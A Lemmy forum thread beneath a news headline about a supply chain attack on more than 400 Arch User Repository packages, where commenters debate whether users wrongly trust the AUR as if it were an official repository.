A massive supply chain attack targeting the Arch User Repository (AUR) has compromised more than 400 community-maintained packages, with attackers injecting malicious build scripts designed to deploy credential-stealing malware and rootkit-style payloads on affected Linux systems.
  • misterrabbit@lemmy.worldEnglish
    39·
    1 day ago

    Been saying for years that people need to stop treating the AUR like a repo, when it’s more akin to curl installscript.sh | bash.

    • Cethin@lemmy.zipEnglish
      82·
      24 hours ago

      But it is a repo. It’s just an unofficial one. I don’t know how you use it without understanding this. It’s not far from perfect, but it is useful.

      • gergo@lemmy.worldEnglish
        61·
        23 hours ago

        the problem is exactly the fact that it is a repo; it introduces a layer of unknown between the dev and the user. and the user will unavoidably “trust” it (especially when it’s listed amongst official repos in e.g. the graphical version of Pamac), without understanding the risks.